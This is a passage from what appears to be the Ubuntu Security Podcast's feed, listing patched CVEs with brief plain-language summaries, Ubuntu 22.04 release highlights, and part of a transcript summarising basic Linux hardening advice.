<li>1 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-26280">CVE-2022-26280</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB when handling crafted LZMA archives -&gt; DoS</li>
</ul>
<h3 id="usn-5372-1-subversion-vulnerabilities-04-24">[<a href="https://ubuntu.com/security/notices/USN-5372-1">USN-5372-1</a>] Subversion vulnerabilities [04:24]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24070">CVE-2022-24070</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28544">CVE-2021-28544</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 vulns in svn server - both in handling of path based auth rules - 1 as
logic error could then allow an attacker to bypass these and info about
private paths</li>
<li>other as a UAF -&gt; crash/RCE</li>
</ul>
<h3 id="usn-5376-1-git-vulnerability-05-13">[<a href="https://ubuntu.com/security/notices/USN-5376-1">USN-5376-1</a>] Git vulnerability [05:13]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24765">CVE-2022-24765</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible local RCE if another user creates a .git directory in the system
root and specifies arbitrary commands in that git config</li>
</ul>
<h3 id="usn-5371-1-nginx-vulnerabilities-05-55">[<a href="https://ubuntu.com/security/notices/USN-5371-1">USN-5371-1</a>] nginx vulnerabilities [05:55]</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3618">CVE-2021-3618</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36309">CVE-2020-36309</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11724">CVE-2020-11724</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>HTTP req smuggling</li>
</ul>
<h3 id="usn-5378-1-usn-5378-2-usn-5378-3-usn-5378-4-gzip-and-xz-utils-vulnerability-06-05">[<a href="https://ubuntu.com/security/notices/USN-5378-1">USN-5378-1</a>, <a href="https://ubuntu.com/security/notices/USN-5378-2">USN-5378-2</a>, <a href="https://ubuntu.com/security/notices/USN-5378-3">USN-5378-3</a>, <a href="https://ubuntu.com/security/notices/USN-5378-4">USN-5378-4</a>] Gzip &amp; XZ Utils vulnerability [06:05]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1271">CVE-2022-1271</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>xzgrep/zgrep with crafted filenames -&gt; local file overwrite</li>
</ul>
<h3 id="usn-5379-1-klibc-vulnerabilities-06-27">[<a href="https://ubuntu.com/security/notices/USN-5379-1">USN-5379-1</a>] klibc vulnerabilities [06:27]</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-31873">CVE-2021-31873</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31872">CVE-2021-31872</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31871">CVE-2021-31871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31870">CVE-2021-31870</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various integer overflows and other bugs leading to memory corruption -&gt;
RCE in these low-level tools (designed for use in initramfs/embedded
systems etc - cat/dd/dmesg/gzip/ipconfig/mv/readlink and more)</li>
</ul>
<h3 id="usn-5380-1-bash-vulnerability-07-12">[<a href="https://ubuntu.com/security/notices/USN-5380-1">USN-5380-1</a>] Bash vulnerability [07:12]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18276">CVE-2019-18276</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Incorrect handling of setuid binaries - didn&rsquo;t drop privileges correctly,
so could allow a user who could cause bash to load their own crafted
builtin module to then escalate privileges by then restoring the saved
UID</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-22-dot-04-lts-release-08-02">Ubuntu 22.04 LTS Release! [08:02]</h3>
<ul>
<li>By the time you read / hear this will likely already be out</li>
<li>LTS - 5 years of standard support, plus 5 years of ESM support - 10 years
of security support in total</li>
<li><a href="https://discourse.ubuntu.com/t/jammy-jellyfish-release-notes/24668">https://discourse.ubuntu.com/t/jammy-jellyfish-release-notes/24668</a></li>
<li>Multiple kernels depending on which product you install
<ul>
<li>Desktop
<ul>
<li>5.17 on OEM certified devices</li>
<li>Rolling HWE kernel for other hardware (currently 5.15)</li>
</ul>
</li>
<li>Server
<ul>
<li>Non-rolling LTS kernel (5.15)</li>
</ul>
</li>
<li>Cloud
<ul>
<li>Use optimised kernels in collaboration with partners (currently 5.15+
with additional backports / features)</li>
</ul>
</li>
<li>As always these are just the defaults and you can change as you desired
(ie could enable rolling HWE kernel on server if required)</li>
</ul>
</li>
<li>UDP disabled for NFS mounts</li>
<li>Toolchain upgrades
<ul>
<li>GCC 11.2.0, Python 3.10 (with PIE🥧), LLVM 14, Golang 1.18.x, rustc 1.58</li>
<li>OpenJDK 18 provided (but not default and not in main, still default to
openjdk-11 in main and supported)</li>
</ul>
</li>
<li>systemd-oomd enabled by default on Ubuntu desktop</li>
<li>OpenSSL 3.0
<ul>
<li>Disables various legacy algorithms (SHA1/MD5 for certificate hashes)</li>
</ul>
</li>
<li>nftables default backend for firewall
<ul>
<li>Still ship legacy iptables tools which will use the xtables backend but
not by default - sysadmins need to ensure all applications which
configure firewall rules use the same backend (e.g. if using docker
snap need to switch to legacy xtables backend until the snap is updated
to detect and use the new nftables backend)</li>
</ul>
</li>
<li>ssh-rsa with sha-1 signatures disabled by default in openssh</li>
<li>scp supports a new -s option to use sftp instead of scp which is safer
(see <a href="https://usn.ubuntu.com/3885-1/">USN-3885-1</a> etc)</li>
<li>Firefox is a snap
<ul>
<li>Maintained and published directly by Mozilla - faster access to newer
versions</li>
<li>Sandboxed for improved security hardening</li>
</ul>
</li>
<li>Lots of changes for server too (new BIND, Apache, PostgreSQL, Django,
MySQL, Samba)</li>
<li>Qemu 6.2.0 (massively improved RISC-V support)</li>
<li>Libvirt + swtpm for TPM emulation
<ul>
<li>virt-manager will then enable a TPM OOTB for UEFI boot of VMs</li>
</ul>
</li>
<li>wireguard is now in main \o/</li>
<li>First LTS release for Ubuntu Desktop on RPi</li>
</ul>
<h3 id="ubuntu-security-podcast-on-break-for-1-week">Ubuntu Security Podcast on break for 1 week</h3>
<ul>
<li>Returning end of the first week of May 2022</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E157.mp3" length="14667692" type="audio/mpeg" /><itunes:duration>1130</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 156
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-156/</link>
          <pubDate>Fri, 08 Apr 2022 15:52:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>f224245597a78da4f2562859512a23587415a3962d8f04093e262c47749cc6942101c64f344dc9ead90e17aff9c3a874e53020bbf7c1b486c26fe7f0b8404f43</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 156</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we bring you the TL;DL (too-long, didn't listen 😉) version of
  Camila's recent 4-part Ubuntu hardening series, plus we look at security
  updates for Twisted, rsync, the Linux kernel, DOSBox, Tomcat and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we bring you the TL;DL (too-long, didn't listen 😉) version of
  Camila's recent 4-part Ubuntu hardening series, plus we look at security
  updates for Twisted, rsync, the Linux kernel, DOSBox, Tomcat and more.
  </itunes:summary>
        <description>  This week we bring you the TL;DL (too-long, didn't listen 😉) version of
  Camila's recent 4-part Ubuntu hardening series, plus we look at security
  updates for Twisted, rsync, the Linux kernel, DOSBox, Tomcat and more.
  </description>
        <googleplay:description>  This week we bring you the TL;DL (too-long, didn't listen 😉) version of
  Camila's recent 4-part Ubuntu hardening series, plus we look at security
  updates for Twisted, rsync, the Linux kernel, DOSBox, Tomcat and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we bring you the TL;DL (too-long, didn&rsquo;t listen 😉) version of
Camila&rsquo;s recent 4-part Ubuntu hardening series, plus we look at security
updates for Twisted, rsync, the Linux kernel, DOSBox, Tomcat and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>48 unique CVEs addressed</p>
<h3 id="usn-5354-1-twisted-vulnerabilities-00-47">[<a href="https://ubuntu.com/security/notices/USN-5354-1">USN-5354-1</a>] Twisted vulnerabilities [00:47]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21716">CVE-2022-21716</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21712">CVE-2022-21712</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>No limit to the amount of memory consumed when parsing the SSH version
string from a client/server - malicious client/server could then send an
infinite length version and crash the corresponding server/client -
limited to 4KB</li>
<li>Cookies and auth headers exposed in cross-origin redirects - leak
sensitive info</li>
</ul>
<h3 id="usn-5355-1-usn-5355-2-zlib-vulnerability-01-34">[<a href="https://ubuntu.com/security/notices/USN-5355-1">USN-5355-1</a>, USN-5355-2] zlib vulnerability [01:34]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-25032">CVE-2018-25032</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Announced by Tavis Ormandy on oss-security in last week of March -
reproducible crash when compressing certain inputs</li>
<li>Reported upstream only to be told was already fixed upstream <strong>back in 2018</strong>
but no CVE was ever assigned and since no release had been made since
then no distros had picked it up</li>
<li>Shows the importance of CVEs to distros security patching workflows - in
general no CVE, no patch</li>
<li>New upstream release has now been made as well</li>
</ul>
<h3 id="usn-5359-1-rsync-vulnerability-03-09">[<a href="https://ubuntu.com/security/notices/USN-5359-1">USN-5359-1</a>] rsync vulnerability [03:09]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-25032">CVE-2018-25032</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Same as above - rsync contains a vendored copy of zlib code</li>
</ul>
<h3 id="usn-5357-1-usn-5357-2-linux-kernel-vulnerability-03-24">[<a href="https://ubuntu.com/security/notices/USN-5357-1">USN-5357-1</a>, <a href="https://ubuntu.com/security/notices/USN-5357-2">USN-5357-2</a>] Linux kernel vulnerability [03:24]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-27666">CVE-2022-27666</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 18.04 LTS, 16.04 ESM</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-155/">Episode 155</a> - heap buffer overflow in handling IPsec ESP transformations
-&gt; local user crash / codeexec</li>
<li>UAF in network traffic control subsystem - requires an attacker to be
root OR to be able to use unprivileged user namespaces - which is the
default for Ubuntu (but it is often suggested to disable this in most
hardening guides)</li>
</ul>
<h3 id="usn-5358-1-usn-5358-2-linux-kernel-vulnerabilities-04-45">[<a href="https://ubuntu.com/security/notices/USN-5358-1">USN-5358-1</a>, <a href="https://ubuntu.com/security/notices/USN-5358-2">USN-5358-2</a>] Linux kernel vulnerabilities [04:45]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-27666">CVE-2022-27666</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1055">CVE-2022-1055</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.13 (21.10), 5.4 (20.04 LTS, 18.04 LTS HWE)</li>
</ul>
<h3 id="usn-5356-1-dosbox-vulnerabilities-05-01">[<a href="https://ubuntu.com/security/notices/USN-5356-1">USN-5356-1</a>] DOSBox vulnerabilities [05:01]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12594">CVE-2019-12594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7165">CVE-2019-7165</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow when parsing BAT files with very long lines</li>
<li>Incorrectly would allow access to files under <code>/proc</code>
(e.g. <code>/proc/self/mem</code>) - could then allow an application to get code
execution - added checks on file access to prevent this</li>
</ul>
<h3 id="usn-5360-1-tomcat-vulnerabilities-05-47">[<a href="https://ubuntu.com/security/notices/USN-5360-1">USN-5360-1</a>] Tomcat vulnerabilities [05:47]</h3>
<ul>
<li>9 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-41079">CVE-2021-41079</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25329">CVE-2021-25329</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9494">CVE-2020-9494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33037">CVE-2021-33037</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9484">CVE-2020-9484</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30640">CVE-2021-30640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25122">CVE-2021-25122</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-17527">CVE-2020-17527</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13943">CVE-2020-13943</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Thanks to Evren Yurtesen for providing the patches (from Debian) for
20.04 LTS</li>
<li>Various deserialisation issues -&gt; RCE</li>
<li>Input length validation -&gt; infinite loop -&gt; CPU DoS</li>
<li>HTTP/2 issues on request header handling -&gt; expose requests of one
connection to a different one -&gt; info leak</li>
</ul>
<h3 id="usn-5361-1-linux-kernel-vulnerabilities-06-46">[<a href="https://ubuntu.com/security/notices/USN-5361-1">USN-5361-1</a>] Linux kernel vulnerabilities [06:46]</h3>
<ul>
<li>14 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-45486">CVE-2021-45486</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43976">CVE-2021-43976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42739">CVE-2021-42739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4083">CVE-2021-4083</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39636">CVE-2021-39636</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37159">CVE-2021-37159</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31916">CVE-2021-31916</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28964">CVE-2021-28964</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-0935">CVE-2021-0935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-0920">CVE-2021-0920</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-3702">CVE-2020-3702</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26145">CVE-2020-26145</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26141">CVE-2020-26141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12888">CVE-2020-12888</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4</li>
<li>Various issues from previous episodes</li>
</ul>
<h3 id="usn-5362-1-linux-kernel--intel-iotg--vulnerabilities-07-03">[<a href="https://ubuntu.com/security/notices/USN-5362-1">USN-5362-1</a>] Linux kernel (Intel IOTG) vulnerabilities [07:03]</h3>
<ul>
<li>16 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-22942">CVE-2022-22942</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0742">CVE-2022-0742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0516">CVE-2022-0516</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0435">CVE-2022-0435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0330">CVE-2022-0330</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42327">CVE-2021-42327</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4155">CVE-2021-4155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4090">CVE-2021-4090</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4083">CVE-2021-4083</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0001">CVE-2022-0001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0185">CVE-2022-0185</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0492">CVE-2022-0492</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0847">CVE-2022-0847</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23222">CVE-2022-23222</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23960">CVE-2022-23960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25636">CVE-2022-25636</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.13 kernel targetted to intel IoT platforms</li>
<li>Again includes fixes for various vulns discussed in past episodes</li>
</ul>
<h3 id="usn-5364-1-waitress-vulnerability-07-17">[<a href="https://ubuntu.com/security/notices/USN-5364-1">USN-5364-1</a>] Waitress vulnerability [07:17]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24761">CVE-2022-24761</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Pure python impl of Webserver Gateway Interface (WSGI) standard -
interface spec on how server an application communicate</li>
<li>Request smuggling vuln due to differences in how waitress and a possible
frontend proxy interpret HTTP requests</li>
</ul>
<h3 id="usn-5365-1-h2-vulnerabilities-07-47">[<a href="https://ubuntu.com/security/notices/USN-5365-1">USN-5365-1</a>] H2 vulnerabilities [07:47]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-23221">CVE-2022-23221</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42392">CVE-2021-42392</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Database engine</li>
<li>Deserialisation of untrusted data -&gt; code execution</li>
<li>Crafted connection URLS -&gt; code execution</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="tl-dl-of-recent-series-on-ubuntu-hardening-08-11">TL;DL of recent series on Ubuntu hardening [08:11]</h3>
<ul>
<li>Various listener requests for a summary on the recent series of episodes
discussing Ubuntu hardening</li>
</ul>
<h4 id="transcript">Transcript</h4>
<p>Hello listener! This is going to be a quick episode and so I will make a
quick introduction for it. During our last four episodes we talked about
how to harden our Ubuntu systems, making it more robust&hellip;and dare I say
it? More secure! However, four episodes is quite a lot, and not everyone is
willing to listen to several minutes of my awesome voice, so I am here
today to fix that and give you an episode that is a summary, a &ldquo;Too Long,
Didn&rsquo;t Listen&rdquo; if you will, of those previous four episodes. So let&rsquo;s get
going because today is no day for delays, and let&rsquo;s talk, shortly and
succinctly, about things you can do to harden your Ubuntu system.</p>
<p>Let&rsquo;s start with hardening measures you can apply to your system whilst
installing it:</p>
<p>(1) Encrypt your disk. Input and output operations might take a little
while longer to happen, but if your hardware can take it, that might not
even be an issue. Do remember though that everytime the device is shutdown,
when you turn it on, you will have to decrypt the disk before using the
operating system, which in turn means: inputting a password to get things
going. So maybe only do this if you have a system where this won&rsquo;t be a
hindrance. Oh, and don&rsquo;t lose your password, or else, you&rsquo;ll end up with a
disk full of pretty, but uninterpretable, characters and no functional
operating system at all!</p>
<p>(2) Create a swap partition or a swap file to get the most out of your
RAM. Availability is also a cyber security concern you should have, and
providing your system with some swap space not only buffs it by giving it
more RAM memory to work with - even it if is only a wannabe RAM - but it
also allows you, as a system administrator, to be better prepared to face
memory issues that might come to haunt your system, since you can monitor
your swap space usage and use this as reference to know if your system
might be feeling a little bit overloaded. Avoiding unnecessary crashes just
got a whole lot easier. Choo OOM manager! A side note, though: check your
system requirements so that you setup swap in a way that fits your system&rsquo;s
needs, or else, instead of making your device work better, you will only
make it work harder.</p>
<p>(3) Partition your system! Put /var and /home in different disk partitions
and avoid all that log file backup or those kitty videos from flooding your
disk space and forcing your critical processes to stop execution because
there is no space left in the system. Ooops. Maybe we should also take some
time to update the log backup script and to remind users that the server is
no place to store videos&hellip;even if they are adorable. And while you are at
it, maybe also add /tmp to its own partition. World writable /tmp is a well
known attacker target and grounding it and sending it to the corner to
think about its bad behavior might be a good way to avoid possible
attacks. Especially considering that different partitions can be set to
have different permissions.</p>
<p>(4) Strong passwords. This shouldn&rsquo;t even be in this list because you
already use strong passwords when setting up your users during install,
right? What? I&rsquo;m not nervous because I definitely need to change my
password from &lsquo;security2022&rsquo; to something a lot better, you are!</p>
<p>With an installed system, our hardening journey is far from over, as we now
need to set everything up securely before getting our service and its
related applications running. How to proceed?</p>
<p>(1) Ubuntu does not enable a password for the &lsquo;root&rsquo; user for a reason, and
so, recommendation number one is: just leave &lsquo;root&rsquo; and its password
alone. Leave it there hibernating with all of its amazing and yet
destructive power over the system. No &lsquo;root&rsquo; user password, no successful
brute force attacks, not even through SSH. An attacker in a regular user
shell is a lot less scary than an attacker in a &lsquo;root&rsquo; shell. Use &lsquo;sudo&rsquo;
instead, and configure &lsquo;sudo&rsquo; permissions for your users appropriately in
the /etc/sudoers file. YOU get to CHOOSE what commands each user can run as
the superuser, so take your time to set these up. Give each user the least
they need to perform their tasks, and stay safe. I know&hellip;it&rsquo;s
amazing&hellip;you get to CONTROL what your users are allowed to do in your
system. &ldquo;What? Has this always existed?&rdquo; Yes, my friend, yes it has, so
it&rsquo;s about time you start configuring it properly.</p>
<p>(2) Use SSH instead of Telnet for remote login, because you are NOT a
caveman that requires your data to be transmitted over the network in plain
text. Yes, cavemen knew not to use Telnet and they also knew that even when
using SSH they had to properly configure it before using it, or else, not
even encryption would save them. If you doubt me, go do your
research&hellip;this is 100% historically accurate, my fingers are definitely
not crossed behind my back as I say this. Disable root access through SSH,
use SSH2 instead of SSH1, setup allowlists and denylists for users and IP
addresses, and set a maximum number of login attempts were all of the basic
things cavemen in our planet did when setting up their SSH servers whilst
sitting around their very cozy and newly discovered fires. Plus, they also
setup private key login for their SSH servers, not because they were too
lazy to type in their passwords - …nooooo, they had passphrases for their
keys - but instead because it is a well-known and trusted way to verify the
identity of whoever is trying to connect to the server. Passwords by
themselves sometimes just aren&rsquo;t enough. So&hellip;if cavemen were able to
discover fire AND properly set up their SSH servers&hellip;then it is more than
your obligation to at least do the same, if not more. Oh, and don&rsquo;t forget
to properly set permissions in the &lsquo;authorized_keys&rsquo; file&hellip;I mean&hellip;come on
guys&hellip;properly setting permissions in a very important file in your OS is
a lot easier than hunting, foraging, surviving in the menacing prehistoric
Earth environments, and that&rsquo;s why cavemen did it as well.</p>
<p>(3) Can we really call it hardening of the system if we don&rsquo;t consider
hardening of the one and only, the star of the show, the kernel itself? The
&lsquo;sysctl&rsquo; command in your Ubuntu system is there to attend to all of your
kernel hardening needs, allowing you to define kernel configurations, but
not requiring you to reboot the machine to get them to stick. With &lsquo;sysctl&rsquo;
you can do so many things that I wouldn&rsquo;t be able to summarize it all here,
and I am already in a pinch because I am very bad at making my scripts
short, and I need to keep this one short. So, for now, I will give you a
little taste of what &lsquo;sysctl&rsquo; can do to get those curiosity juices flowing!
Restrict users allowed to read kernel logs and block IP packet forwarding
for devices that are not routers. Was I able to make you interested? Well,
I know I wont get the answer to that, but what I do know is that both those
measures I mentioned can already take you a long way when you think of
hardening your system, and they are two amongst many available&hellip;sooo, get
those fingers typing and those kernel options researched and you, my
friend, are in the right path to get your system hardened!</p>
<p>(4) Setup a host based firewall. They are efficient in blocking unwanted
network traffic, they can be configured to your host&rsquo;s specific needs and
they are portable, since, when the host migrates, its firewall goes with
it. Plus, it&rsquo;s very easy to set up, you can use the Ubuntu tool known as
the Uncomplicated Firewall (&lsquo;ufw&rsquo;) to help you, and it gets you started on
protecting yourself against the harsh, harsh Internet ecosystem that lies
out there.  Oh, and don&rsquo;t even try to argue with me and tell me about your
network based firewall and how it already does the job for you, because I
just discussed it in the long version of this series, so to make it short,
I will say one simple word to get my point across once again: layers!</p>
<p>(5) Remember when we were talking about partitioning your disk/filesystem?
Well, let&rsquo;s kick that up a notch and configure each partition individually,
setting permissions and defining usage configurations for each one of the
different partitions in our disks. We are all unique in this huge world we
live in, and so are our partitions. Treat them with the love, care and
individuality that they deserve and they shall return all of your efforts
in the form of a more secure system. If you have a network shared
partition, for example, why not set the &rsquo;noexec&rsquo; option for this partition,
and avoid executables to be run from an area in your device that could be
considered untrustworthy at best and devastatingly dangerous at worst?
Don&rsquo;t trust users, I always say, specifically when they come for your files
through the network. Another good option would be to set a partition as
read-only, if it is a partition that requires no more permissions than
this. The /etc/fstab file is the one you can go to in order to set all of
these configurations, which will be applied at mount time, exactly during
system boot.</p>
<p>(6) Don&rsquo;t ignore your logs. Setup a nice logging system for your
device. Use syslog or journal to do so, and yeah&hellip;sure&hellip;thank me later, I
won&rsquo;t complain if you do. But seriously though, how can you expect to
maintain and troubleshoot a device if you don&rsquo;t know what is happening with
that device? And how do you expect to keep a system secure if you can&rsquo;t
maintain and troubleshoot it? Yes, logs can be annoying to look at and
analyze sometimes, but that is why utilities such as &lsquo;syslogd&rsquo; and
&lsquo;journald&rsquo; exist to help you search through those logs. Syslog even allows
you to send all of your data to a centralized server, which can then focus
exclusively on processing log data that it gets from various network
devices. You have all of that goldmine of data at your feet and all you
need to do now is use it. Ubuntu has the tools that allow you to do that,
but it doesn&rsquo;t have the will&hellip;that, my friend, needs to come from you. So
to show how important it is to set up and use logs, I will end this
suggestion with a quote, because everything that includes quotes is usually
considered important, right? &ldquo;Knowing yourself is the beginning of all
wisdom&rdquo; - Aristotle. There, now go get some logging setup.</p>
<p>Ok. Next step is installing your applications so that you can get your
service up and running. I am not even going to go into detail about using
secure software, setting up this software including security
configurations, and using encryption when sending data through the network,
because that is obvious enough, right? If not&hellip;then I am sorry to tell
you, you might need to listen to the long version of this. I will go into
detail though, not much, but a little bit (if you want &lsquo;much&rsquo;, go listen to
parts 1, 2, 3 and 4), on what you can do after you set up your service, and
on what you can do until forever to keep your hardened system from going
soft on you. So let&rsquo;s jump in.</p>
<p>(1) One or two network services per device!!! Don&rsquo;t make your server a jack
of all trades, because that is a recipe for a hack of all spaces. If you
are going to use the network to expose your service, maybe incorporate it
